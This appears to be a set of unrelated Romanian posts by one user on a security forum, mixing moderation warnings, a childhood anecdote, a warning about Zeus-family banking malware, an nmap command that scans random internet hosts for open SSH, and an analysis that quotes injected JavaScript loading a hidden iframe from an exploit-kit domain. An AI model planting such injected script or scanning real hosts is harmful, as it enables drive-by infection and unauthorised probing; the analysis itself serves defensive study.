malsploit

Nu mai lasati raspunsuri gen gg, gj si nu mai dati c/p la statistici. Daca vreti sa-i multumiti omului, folositi butonul de like sau rep. Daca aveti 0 la rep, folositi like.

Primesti warn pentru categorie gresita si postul il mutam la market

Il inchidem ca vin copiii cu un post peste noi.

Se pot pune gif in semnaturi. numai sa nu exagerati sa nu se transforme rst in hi5. //closed

^Cei care vreti sa faceti off-topic, abtineti-va! onslaught data viitoare, cand ai nevoie de ajutor fii mai explicit. Comunitatea te poate ajuta sa gasesti solutii, dar nu te poate ajuta sa formulezi o cerere de ajutor. Cred ca vrei sa iti spuna cineva cum se termina meciurile alea.

Felicitari! Cand ai timp, te rog sa faci un tutorial in care sa prezinti tipul asta de vulnerabilitate.

Pentru ca autorul thread-ului a hotarat sa numai ofere invitatii, acest thread va fi inchis.

E laudabila intentia ta. Pentru asta ai buton de like. Iti urez o sedere placuta.

Bine ai venit Ai primit warn pentru posturi inutile. Nu ajuti pe nimeni daca postezi GG, bravo, etc Daca ai nevoie de ceva, trebuie sa oferi ceva comunitatii. Daca nu ai ce sa oferi, sacrifica putin timp si invata. Intre timp, treci pe la regulament.

Eu folosesc blogger. Fara limita si fara restrictii si sunt sigur ca nu mi le sterge nimeni si am si control asupra imaginilor.

Poate ii dai si tu VIP Doar azi

La multi ani Andrei. Sa traiesti si sa ne imbeti pe toti la defcamp

^ //de la net 1930 este numarul de la relatii cu clientii de la romtelecom

fara vreo legatura directa cu subiectul Era prin '87. Parintii mei locuiau in Marasesti, Vrancea. In vremurile alea, era un serviciu oferit de catre primarie, contra unei sume mici. Iti intrau 2 fire in casa si tu legai la ele un difuzor si ascultai un post de radio, de obicei Radio Romania Actualitati, la care mai erau prezentate si stiri de interes local. Dupa ce a fost o furtuna in zona, ai mei au inceput sa auda in difuzorul ala persoane care se certau. Li se pareau cunoscute vocile. Dupa ce au analizat ei putin, ai-au dat seama ca erau vecinii lor care incepusera sa se certe. S-au dus la ei sa le spuna grozavenia. S-au folosit de treaba asta ceva timp. Vorbeau unii cu altii, se mai injura tata cu vecinu, chestii pe care le fac oamenii dupa ceva rece. Dupa ceva timp, au venit la ei niste militieni si le-a stricat joaca. au ramas si ei uimiti. Vreo 3 luni "Difuzorul", asa se numea oficial serviciul, nu a mai functionat.

Aveti grja cand umblati cu Zeuz/carberp/Citadel(un zeus modificat). Sunt virusi creati pentru furtul de date bancare si puteti fi trasi la raspundere destul de usor. Astea nu sunt stealere sau keyloggere pe care sa la folositi sa faceti misto de prieteni.

chmod +x /etc/privoxy/config

//buna idee pentru un honeypot cand am nevoie de ceva pentru teste fac: nmap -iR 1000 -p 22 --open -sV --oG 22 apoi cat 22 | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' si gata lista

trebuie sa mearga. Incearca sa o tastezi manual fara c&p.

parola e plaintext.

Nici la mine nu a mers. Am facut tot ce era posibil. Pagina contine linia asta: </body><script type="text/javascript" src="hxxp://adultbiz.in/new/jquery.php"></script> Aici se incarca un script care detecteaza browserul si incarca un payload: function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'hxxp://test1.elguay.es/display/seek.php'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Acum trebuia sa se incarce un exploit kit. O sa incerc si pe un sistem cu xp/java/flash/pdf/opera sa vad daca reusesc sa fiu "exploatat"

Postarea e din 27 iunie Cred ca omul e la curent cu noutatile din domeniu. Chestia asta i-a adus si destul de multe probleme

Ai uitat de #include "nsa_backdoor"

Daca poti uploadeaza undeva un fisier infectat sa ma uit prin el si poate reusesc sa scot codul de verificare

Am gasit asta intr-un raport unde era analizat un malware:

eu am primit acum ceva timp, inainte de bug-bounty, o licenta pentru ca am raportat un LFI.